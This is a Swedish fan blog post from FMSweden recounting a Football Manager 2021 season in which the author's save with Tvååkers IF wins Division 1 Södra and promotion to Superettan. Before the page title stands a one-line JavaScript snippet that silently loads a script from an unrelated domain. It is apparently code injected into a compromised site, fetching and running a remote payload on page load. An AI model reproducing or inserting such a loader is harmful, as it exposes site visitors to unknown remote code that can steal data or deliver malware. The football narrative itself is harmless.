;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); AW med Tobbe – FM21 – FMSweden
Meny Stäng

AW med Tobbe – FM21

Eftersom jag ville testa FM21 innan jag sätter mig ner och grottar in mig totalt, så valde jag att starta med laget som jag varit assisterande tränare åt halva hösten, Tvååkers IF. Jag har ju samma position på spelet i just Tvååker, så det blev en tränarstab med Tobias Hysén x 2. Resultatet? 

Jag tog över Tvååker med målsättningen av hamna topp-5 första året. Jag vet att det finns kvalité i laget och med resultatraden 5-2-2 sen Mattias Lindström och undertecknad fick ta över, så vet jag att laget ska vara högre upp i tabellen. Jag själv har ju sex matcher på bänken och 4-1-1, så ja, ni fattar. Hahahaha

Jag satte ganska snabbt en startelva och den elvan blev rätt oförändrad genom säsongen, jag hade tur med skador och kunde spela samma elva nästan alla matcher, vilket är sjukt ovanligt när jag spelar.

Med respekt för spelarna kommer jag inte gå in på exakt vilka som spelade, men jag ska nämna några höjdpunkter under året.

Vi började med att spela lite träningsmatcher mot sämre lag, för att kunna se vilka som tog chansen och vilka som kanske inte är lika bra på spelet som i verkligheten. Det är ju trots allt en faktor man får ta hänsyn till, finns ingen tid att vara social.

Det märktes ganska snabbt att anfallsparet precis som i verkligheten blev Jakob Adolfsson och Hugo Svensson. Det var för att dom öste in mål från start. 49 av 70 mål i serien skulle dessa herrar stå för och Hugo Svensson blev skytteligavinnare med sina 27 mål. Helt makalöst bra.

Oliver Hintsa, lånet från HBK, skulle vinna assistligan i Div 1 Södra med sina 12 assist och bidrog också starkt till årets säsong.

Vi startade med att vinna 5 av 6 första matcherna varav en var en fullständig demolering av FC Trollhättan med 8-2 på hemmaplan. Efter halva serien ledde Tvååker sensationellt serien med 4 poäng till godo till Landskrona Bois. IFK Värnamo och Lindome var också med och slogs i toppen och så skulle det förbli.

Hugo Svensson och Jakob Adolfsson fortsatte ösa in mål och när det var dags för Svenska Cupen-kval mot MFF, fanns där en liten förhoppning om en skräll. Malmö hade lämnat en del spelare hemma och vi trodde på våra chanser.

Om det var nån match under 2020, som vi såg ut som statister var det denna. 1-7 nere i Malmö och drömmen om gruppspel försvann lika fort den första snön. 

Det blev en liten reaktion på den fullständiga förnedringen och vi spelade fyra raka matcher utan att vinna i serien. Vi låg efter 23 omgångar nu 2:a med två poäng upp till Landskrona som ledde serien.

Det var då jag kände att det var dags för ett lagmöte för att peppa gubbarna lite. Jag försökte vara positiv och påtala hur bra vi hade varit och att det var dags att snäppa upp igen. Mötet fick önskad effekt, vi vann fyra matcher i rad och med tre omgångar kvar ledde vi nu serien igen, med två poäng ner till Landskrona och fyra till Värnamo.

Ett kryss och en vinst senare, var situationen sådan att Tvååker behövde spela oavgjort sista matchen mot FC Trollhättan av alla lag, laget vi förnedrat med 8-2 tidigare under säsongen, för att bli seriesegrare och klara för Superettan. Landskrona kunde fortfarande vinna sin match och om vi förlorade, skulle då istället skåningarna ta förstaplatsen.

Det blev en raffinerad avslutning där Landskrona tidigt ryckte iväg i sin match och vi hade 1-1 i halvtid.

I den 90:e minuten dök andra halvleks första höjdpunkt upp (jag kör nyckelhöjdpunkter). Fy fan, ett mål för Trollhättan skulle betyda att vi fick se oss passerade under säsongen sista minuter. Pulsen gick upp i 140.

Det visade sig dock att det enda som hände var att våra mittfältare Carl Martinsson drog på sig ett direkt rött kort på mittplan. Matchen fortsatte och tiden tog slut.

TVÅÅKERS IF ÄR KLARA FÖR SUPERETTAN 2021!!!

Ha nu en trevlig helg.

SKÅL

Tobbe

 

Please wait...

Liknande Inlägg

3 kommentarer

Lämna ett svar